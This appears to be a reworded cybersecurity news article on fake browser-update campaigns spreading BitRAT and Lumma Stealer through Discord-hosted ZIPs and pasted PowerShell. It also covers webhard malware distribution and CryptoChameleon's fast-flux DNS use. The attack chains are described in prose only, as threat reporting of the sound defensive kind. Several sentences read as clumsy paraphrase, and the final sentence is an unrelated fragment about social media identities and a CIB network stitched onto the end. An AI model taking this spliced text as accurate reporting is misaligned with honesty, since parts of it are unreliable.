Fake web browser updates are being used to spread remote access trojans (RATs) and information stealer malware such as BitRAT and Lumma Stealer (aka LummaC2).
"Fake browser updates have been responsible for numerous malware infections, including those of the well-known SocGholish malware," cybersecurity company eSentire claimed in a recent research. "In April 2024, we observed FakeBat being distributed via similar fake update mechanisms."
The attack chain originates when potential targets visits a booby-trapped website that includes JavaScript code meant to send visitors to a fraudulent browser update page ("chatgpt-app[.]cloud").
The redirected web page comes contained with a download link to a ZIP archive file ("Update.zip") that's housed on Discord and downloaded automatically to the victim's device.
It's worth noting out that threat actors routinely utilize Discord as an attack vector, with a recent investigation from Bitdefender discovering more than 50,000 harmful links propagating malware, phishing campaigns, and spam over the last six months.
Present inside the ZIP package file is another JavaScript file ("Update.js"), which initiates the execution of PowerShell scripts responsible for obtaining further payloads, including BitRAT and Lumma Stealer, from a remote server in the form of PNG image files.
Also obtained in this way are PowerShell scripts to create persistence and a .NET-based loader that's largely utilized for launching the final-stage malware. eSentire argued that the loader is likely promoted as a "malware delivery service" due to the fact that the same loader is used to install both BitRAT and Lumma Stealer.
BitRAT is a feature-rich RAT that enables attackers to gather data, mine bitcoin, download new malware, and remotely control the infected systems. Lumma Stealer, a commodity stealer virus offered for $250 to $1,000 per month since August 2022, promises the capacity to grab information from online browsers, crypto wallets, and other sensitive facts.
"The fake browser update lure has become common amongst attackers as a means of entry to a device or network," the firm said, adding it "displays the operator's ability to leverage trusted names to maximize reach and impact."
While such attacks typically leverage drive-by downloads and malvertising techniques, ReliaQuest, in a report published last week, said it discovered a new variant of the ClearFake campaign that tricks users into copying, pasting, and manually executing malicious PowerShell code under the pretext of a browser update.
Specifically, the malicious website claims that "something went wrong while displaying this webpage" and instructs the site visitor to install a root certificate to address the issue by following a series of steps, which involves copying obfuscated PowerShell code and running it in a PowerShell terminal.
"Upon execution, the PowerShell code performs multiple functions, including clearing the DNS cache, displaying a message box, downloading further PowerShell code, and installing 'LummaC2' malware," the firm claimed.
According to research supplied by the cybersecurity organization, Lumma Stealer appeared as one of the most frequent information stealers in 2023, alongside RedLine and Raccoon.
"The number of LummaC2-obtained logs listed for sale increased by 110% from Q3 to Q4 2023," it added. "LummaC2's rising popularity among adversaries is likely due to its high success rate, which refers to its effectiveness in successfully infiltrating systems and exfiltrating sensitive data without detection."
The development comes as the AhnLab Security Intelligence Center (ASEC) disclosed details of a new campaign that employs webhards (short for web hard drive) as a conduit to distribute malicious installers for adult games and cracked versions of Microsoft Office and ultimately deploy a variety of malware such as Orcus RAT, XMRig miner, 3proxy, and XWorm.
Similar attack chains using websites advertising unlicensed software have led to the deployment of malware loaders like PrivateLoader and TaskLoader, which are both provided as a pay-per-install (PPI) service for other cybercriminals to distribute their own payloads.
It also follows recent revelations from Silent Push concerning CryptoChameleon's "almost exclusive use" of DNSPod[.]com nameservers to power its phishing kit architecture. DNSPod, part of the Chinese corporation Tencent, has a history of offering services for malevolent bulletproof hosting companies.
"CryptoChameleon uses DNSPod nameservers to engage in fast flux evasion techniques that allow threat actors to quickly cycle through large amounts of IPs linked to a single domain name," the business stated.
"Fast flux allows CryptoChameleon infrastructure to evade traditional countermeasures, and significantly reduces the operational value of legacy point-in-time IOCs." employing at least seven principal social media identities and a CIB network of more than 250 users.
